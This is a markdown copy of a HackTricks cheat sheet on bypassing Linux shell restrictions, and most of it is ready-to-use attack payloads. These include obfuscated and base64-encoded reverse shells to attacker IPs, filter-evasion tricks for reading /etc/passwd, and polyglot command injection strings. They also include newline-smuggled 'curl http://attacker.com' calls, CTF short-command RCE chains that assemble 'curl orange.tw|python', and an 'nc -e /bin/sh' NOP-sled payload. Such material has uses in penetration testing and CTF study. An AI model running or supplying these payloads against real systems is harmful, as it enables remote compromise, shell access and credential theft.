overview.md (13779B)
1 --- 2 title: "Bypass Linux Restrictions" 3 section: "Linux" 4 sectionSlug: "linux-hardening" 5 sourcePath: "src/linux-hardening/linux-basics/bypass-linux-restrictions/README.md" 6 sourceUrl: "https://github.com/HackTricks-wiki/hacktricks/blob/188de82beb54e70956b2952367a0af91d26758b8/src/linux-hardening/linux-basics/bypass-linux-restrictions/README.md" 7 sha: "188de82beb54e70956b2952367a0af91d26758b8" 8 isIndex: true 9 modified: true 10 license: "CC-BY-NC-4.0" 11 --- 12 13 # Bypass Linux Restrictions 14 15 ## Common Limitations Bypasses 16 17 The command-injection and WAF-evasion collections in PayloadsAllTheThings, Bo0oM's cheat sheet, and the two linked Secjuice articles provide background for the shell-syntax variations in this section.<sup>[[1]](#references)[[2]](#references)[[3]](#references)[[4]](#references)</sup> 18 19 ### Reverse Shell 20 21 ```bash 22 # Double-Base64 payload 23 echo "echo $(echo 'bash -i >& /dev/tcp/10.10.14.8/4444 0>&1' | base64 | base64)|ba''se''6''4 -''d|ba''se''64 -''d|b''a''s''h" | sed 's/ /${IFS}/g' 24 # echo${IFS}WW1GemFDQXRhU0ErSmlBdlpHVjJMM1JqY0M4eE1DNHhNQzR4TkM0NEx6UTBORFFnTUQ0bU1Rbz0K|ba''se''6''4${IFS}-''d|ba''se''64${IFS}-''d|b''a''s''h 25 ``` 26 27 ### Short Rev shell 28 29 ```bash 30 #Trick from Dikline 31 #Get a rev shell with 32 (sh)0>/dev/tcp/10.10.10.10/443 33 #Then get the out of the rev shell executing inside of it: 34 exec >&0 35 ``` 36 37 ### Bypass Paths and forbidden words 38 39 ```bash 40 # Question mark binary substitution 41 /usr/bin/p?ng # /usr/bin/ping 42 nma? -p 80 localhost # /usr/bin/nmap -p 80 localhost 43 44 # Wildcard(*) binary substitution 45 /usr/bin/who*mi # /usr/bin/whoami 46 47 # Wildcard + local directory arguments 48 touch -- -la # -- stops processing options after the -- 49 ls * 50 echo * #List current files and folders with echo and wildcard 51 52 # [chars] 53 /usr/bin/n[c] # /usr/bin/nc 54 55 # Quotes 56 'p'i'n'g # ping 57 "w"h"o"a"m"i # whoami 58 ech''o test # echo test 59 ech""o test # echo test 60 bas''e64 # base64 61 62 #Backslashes 63 \u\n\a\m\e \-\a # uname -a 64 /\b\i\n/////s\h 65 66 # $@ 67 who$@ami #whoami 68 69 # Transformations (case, reverse, base64) 70 $(tr "[A-Z]" "[a-z]"<<<"WhOaMi") #whoami -> Upper case to lower case 71 $(a="WhOaMi";printf %s "${a,,}") #whoami -> transformation (only bash) 72 $(rev<<<'imaohw') #whoami 73 bash<<<$(base64 -d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==) #base64 74 75 # Execution through $0 76 echo whoami|$0 77 78 # Uninitialized variables: A uninitialized variable equals to null (nothing) 79 cat$u /etc$u/passwd$u # Use the uninitialized variable without {} before any symbol 80 p${u}i${u}n${u}g # Equals to ping, use {} to put the uninitialized variables between valid characters 81 82 # New lines 83 p\ 84 i\ 85 n\ 86 g # These 4 lines will equal to ping 87 88 # Fake commands 89 p$(u)i$(u)n$(u)g # Equals to ping but 3 errors trying to execute "u" are shown 90 w`u`h`u`o`u`a`u`m`u`i # Equals to whoami but 5 errors trying to execute "u" are shown 91 92 # Concatenation of strings using history 93 !-1 # This will be substitute by the last command executed, and !-2 by the penultimate command 94 mi # This will throw an error 95 whoa # This will throw an error 96 !-1!-2 # This will execute whoami 97 ``` 98 99 ### Bypass forbidden spaces 100 101 ```bash 102 # {form} 103 {cat,lol.txt} # cat lol.txt 104 {echo,test} # echo test 105 106 # IFS - Internal field separator, change " " for any other character ("]" in this case) 107 cat${IFS}/etc/passwd # cat /etc/passwd 108 cat$IFS/etc/passwd # cat /etc/passwd 109 110 # Put the command line in a variable and then execute it 111 IFS=];b=wget]10.10.14.21:53/lol]-P]/tmp;$b 112 IFS=];b=cat]/etc/passwd;$b # Using 2 ";" 113 IFS=,;`cat<<<cat,/etc/passwd` # Using cat twice 114 # Other way, just change each space for ${IFS} 115 echo${IFS}test 116 117 # Using hex format 118 X=$'cat\x20/etc/passwd'&&$X 119 120 # Using tabs 121 echo "ls\x09-l" | bash 122 123 # Undefined variables and ! 124 $u $u # This will be saved in the history and can be used as a space, please notice that the $u variable is undefined 125 uname!-1\-a # This equals to uname -a 126 ``` 127 128 ### Bypass backslash and slash 129 130 ```bash 131 cat ${HOME:0:1}etc${HOME:0:1}passwd 132 cat $(echo . | tr '!-0' '"-1')etc$(echo . | tr '!-0' '"-1')passwd 133 ``` 134 135 ### Bypass pipes 136 137 ```bash 138 bash<<<$(base64 -d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==) 139 ``` 140 141 ### Bypass with hex encoding 142 143 ```bash 144 echo -e "\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64" 145 cat `echo -e "\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64"` 146 abc=$'\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64';cat abc 147 `echo $'cat\x20\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64'` 148 cat `xxd -r -p <<< 2f6574632f706173737764` 149 xxd -r -ps <(echo 2f6574632f706173737764) 150 cat `xxd -r -ps <(echo 2f6574632f706173737764)` 151 ``` 152 153 ### Bypass IPs 154 155 ```bash 156 # Decimal IPs 157 127.0.0.1 == 2130706433 158 ``` 159 160 ### Time based data exfiltration 161 162 ```bash 163 time if [ $(whoami|cut -c 1) == s ]; then sleep 5; fi 164 ``` 165 166 ### Getting chars from Env Variables 167 168 ```bash 169 echo ${LS_COLORS:10:1} #; 170 echo ${PATH:0:1} #/ 171 ``` 172 173 ### DNS data exfiltration 174 175 For out-of-band callbacks, a collaborator-style service such as Burp Collaborator can induce a target application to interact with an external server; the existing [**pingb**](http://pingb.in) link is retained as historical navigation, not a current availability claim.<sup>[[6]](#references)</sup> 176 177 ### Builtins 178 179 In a restricted shell, the available builtins are the remaining command surface for these examples; Bash documents its builtin commands and execution grammar.<sup>[[7]](#references)</sup> Idea from [**devploit**](https://twitter.com/devploit).\ 180 Start with the existing [**shell builtins**](https://www.gnu.org/software/bash/manual/html_node/Shell-Builtin-Commands.html) navigation, then try the following Bash-specific techniques:<sup>[[7]](#references)</sup> 181 182 ```bash 183 # Get list of builtins 184 declare builtins 185 186 # In these cases PATH won't be set, so you can try to set it 187 PATH="/bin" /bin/ls 188 export PATH="/bin" 189 declare PATH="/bin" 190 SHELL=/bin/bash 191 192 # Hex 193 $(echo -e "\x2f\x62\x69\x6e\x2f\x6c\x73") 194 $(echo -e "\x2f\x62\x69\x6e\x2f\x6c\x73") 195 196 # Input 197 read aaa; exec $aaa #Read more commands to execute and execute them 198 read aaa; eval $aaa 199 200 # Get "/" char using printf and env vars 201 printf %.1s "$PWD" 202 ## Execute /bin/ls 203 $(printf %.1s "$PWD")bin$(printf %.1s "$PWD")ls 204 ## To get several letters you can use a combination of printf and 205 declare 206 declare functions 207 declare historywords 208 209 # Read flag in current dir 210 source f* 211 flag.txt:1: command not found: CTF{asdasdasd} 212 213 # Read file with read 214 while read -r line; do echo $line; done < /etc/passwd 215 216 # Get env variables 217 declare 218 219 # Get history 220 history 221 declare history 222 declare historywords 223 224 # Disable special builtins chars so you can abuse them as scripts 225 [ #[: ']' expected 226 ## Disable "[" as builtin and enable it as script 227 enable -n [ 228 echo -e '#!/bin/bash\necho "hello!"' > /tmp/[ 229 chmod +x [ 230 export PATH=/tmp:$PATH 231 if [ "a" ]; then echo 1; fi # Will print hello! 232 ``` 233 234 ### Polyglot command injection 235 236 ```bash 237 1;sleep${IFS}9;#${IFS}';sleep${IFS}9;#${IFS}";sleep${IFS}9;#${IFS} 238 /*$(sleep 5)`sleep 5``*/-sleep(5)-'/*$(sleep 5)`sleep 5` #*/-sleep(5)||'"||sleep(5)||"/*`*/ 239 ``` 240 241 ### Bypass potential regexes 242 243 ```bash 244 # A regex that only allow letters and numbers might be vulnerable to new line characters 245 1%0a`curl http://attacker.com` 246 ``` 247 248 ### Bashfuscator 249 250 The following invocation uses Bashfuscator, an open-source Bash obfuscation framework; the repository link in the code comment is retained as navigation.<sup>[[8]](#references)</sup> 251 252 ```bash 253 # From https://github.com/Bashfuscator/Bashfuscator 254 ./bashfuscator -c 'cat /etc/passwd' 255 ``` 256 257 ### RCE with 5 chars 258 259 The following two historical 5-character examples are retained as challenge reproductions: the primary challenge repository is available at [Orange Tsai’s repository](https://github.com/orangetw/My-CTF-Web-Challenges), while the second write-up link in the code block is navigation whose current availability was not verified.<sup>[[9]](#references)</sup> 260 261 ```bash 262 # From the Orange Tsai BabyFirst Revenge challenge: https://github.com/orangetw/My-CTF-Web-Challenges#babyfirst-revenge 263 #Orange Tsai solution 264 ## Step 1: generate `ls -t>g` to file "_" to be able to execute ls ordening names by cration date 265 http://host/?cmd=>ls\ 266 http://host/?cmd=ls>_ 267 http://host/?cmd=>\ \ 268 http://host/?cmd=>-t\ 269 http://host/?cmd=>\>g 270 http://host/?cmd=ls>>_ 271 272 ## Step2: generate `curl orange.tw|python` to file "g" 273 ## by creating the necesary filenames and writting that content to file "g" executing the previous generated file 274 http://host/?cmd=>on 275 http://host/?cmd=>th\ 276 http://host/?cmd=>py\ 277 http://host/?cmd=>\|\ 278 http://host/?cmd=>tw\ 279 http://host/?cmd=>e.\ 280 http://host/?cmd=>ng\ 281 http://host/?cmd=>ra\ 282 http://host/?cmd=>o\ 283 http://host/?cmd=>\ \ 284 http://host/?cmd=>rl\ 285 http://host/?cmd=>cu\ 286 http://host/?cmd=sh _ 287 # Note that a "\" char is added at the end of each filename because "ls" will add a new line between filenames whenwritting to the file 288 289 ## Finally execute the file "g" 290 http://host/?cmd=sh g 291 292 293 # Another solution from https://infosec.rm-it.de/2017/11/06/hitcon-2017-ctf-babyfirst-revenge/ 294 # Instead of writing scripts to a file, create an alphabetically ordered the command and execute it with "*" 295 https://infosec.rm-it.de/2017/11/06/hitcon-2017-ctf-babyfirst-revenge/ 296 ## Execute tar command over a folder 297 http://52.199.204.34/?cmd=>tar 298 http://52.199.204.34/?cmd=>zcf 299 http://52.199.204.34/?cmd=>zzz 300 http://52.199.204.34/?cmd=*%20/h* 301 302 # Another curiosity if you can read files of the current folder 303 ln /f* 304 ## If there is a file /flag.txt that will create a hard link 305 ## to it in the current folder 306 ``` 307 308 ### RCE with 4 chars 309 310 ```bash 311 # In a similar fashion to the previous bypass this one just need 4 chars to execute commands 312 # it will follow the same principle of creating the command `ls -t>g` in a file 313 # and then generate the full command in filenames 314 # generate "g> ht- sl" to file "v" 315 '>dir' 316 '>sl' 317 '>g\>' 318 '>ht-' 319 '*>v' 320 321 # reverse file "v" to file "x", content "ls -th >g" 322 '>rev' 323 '*v>x' 324 325 # generate "curl orange.tw|python;" 326 '>\;\\' 327 '>on\\' 328 '>th\\' 329 '>py\\' 330 '>\|\\' 331 '>tw\\' 332 '>e.\\' 333 '>ng\\' 334 '>ra\\' 335 '>o\\' 336 '>\ \\' 337 '>rl\\' 338 '>cu\\' 339 340 # got shell 341 'sh x' 342 'sh g' 343 ``` 344 345 ## Read-Only/Noexec/Distroless Bypass 346 347 If you are inside a filesystem with **read-only and noexec protections**, or in a **distroless image**, the environment imposes execution constraints documented by Linux `mount(8)` and the Distroless project; the linked page collects techniques for working within them.<sup>[[11]](#references)[[12]](#references)</sup> 348 349 [Bypass Fs Protections Read Only No Exec Distroless](/hacktricks/linux-hardening/linux-basics/bypass-linux-restrictions/bypass-fs-protections-read-only-no-exec-distroless/overview) 350 351 ## Chroot & other Jails Bypass 352 353 [Escaping From Limited Bash](/hacktricks/linux-hardening/main-system-information/escaping-from-limited-bash) 354 355 ## Space-Based Bash NOP Sled ("Bashsledding") 356 357 When a vulnerability lets you partially control an argument that ultimately reaches `system()` or another shell, the payload offset may be uncertain. Alan Cao and Will Tan describe a constrained embedded-device case where a shell payload was sprayed into memory-mapped NVRAM and prefixed with spaces.<sup>[[5]](#references)</sup> 358 359 Therefore you can create a *NOP sled for Bash* by prefixing your real command with a long sequence of spaces or tab characters; Bash defines spaces and tabs as blanks that separate words in a simple command.<sup>[[5]](#references)[[7]](#references)</sup> 360 361 ```bash 362 # Payload sprayed into an environment variable / NVRAM entry 363 " nc -e /bin/sh 10.0.0.1 4444" 364 # 16× spaces ───┘ ↑ real command 365 ``` 366 367 If a ROP chain (or another memory-corruption primitive) passes a command-string pointer that begins anywhere within the space block, Bash can parse the remaining leading blanks until it reaches the command; in the cited router exploit, this made uncertain string offsets usable.<sup>[[5]](#references)[[7]](#references)</sup> 368 369 Practical use cases in constrained embedded targets include:<sup>[[5]](#references)</sup> 370 371 1. **Memory-mapped configuration blobs** (e.g. NVRAM) that are accessible across processes.<sup>[[5]](#references)</sup> 372 2. Payload channels where the attacker cannot write NULL bytes to align the payload (a general adaptation of the alignment problem).<sup>[[5]](#references)</sup> 373 3. Embedded devices with a small BusyBox `ash`/`sh` environment, which BusyBox documents as applets in resource-constrained systems.<sup>[[10]](#references)</sup> 374 375 > 🛠️ Combine this technique with ROP gadgets that call `system()` in a controlled lab; the cited router research demonstrates this combination on constrained hardware.<sup>[[5]](#references)</sup> 376 377 ## References 378 379 - [1] [PayloadsAllTheThings - Command Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection#exploits) 380 - [2] [Bo0oM - WAF-bypass-Cheat-Sheet](https://github.com/Bo0oM/WAF-bypass-Cheat-Sheet) 381 - [3] [Web Application Firewall (WAF) Evasion Techniques #2 - theMiddle](https://medium.com/secjuice/web-application-firewall-waf-evasion-techniques-2-125995f3e7b0) 382 - [4] [Web Application Firewall (WAF) Evasion Techniques #3 - theMiddle](https://www.secjuice.com/web-application-firewall-waf-evasion/) 383 - [5] [Alan Cao and Will Tan — Exploiting zero days in abandoned hardware – Trail of Bits blog](https://blog.trailofbits.com/2025/07/25/exploiting-zero-days-in-abandoned-hardware/) 384 - [6] [Burp Collaborator - PortSwigger](https://portswigger.net/burp/documentation/desktop/tools/collaborator) 385 - [7] [bash(1) — Linux manual page](https://man7.org/linux/man-pages/man1/bash.1.html) 386 - [8] [Bashfuscator](https://github.com/Bashfuscator/Bashfuscator) 387 - [9] [My-CTF-Web-Challenges — Orange Tsai](https://github.com/orangetw/My-CTF-Web-Challenges) 388 - [10] [BusyBox](https://busybox.net/downloads/BusyBox.html) 389 - [11] [mount(8) — Linux manual page](https://man7.org/linux/man-pages/man8/mount.8.html) 390 - [12] [Distroless](https://github.com/GoogleContainerTools/distroless)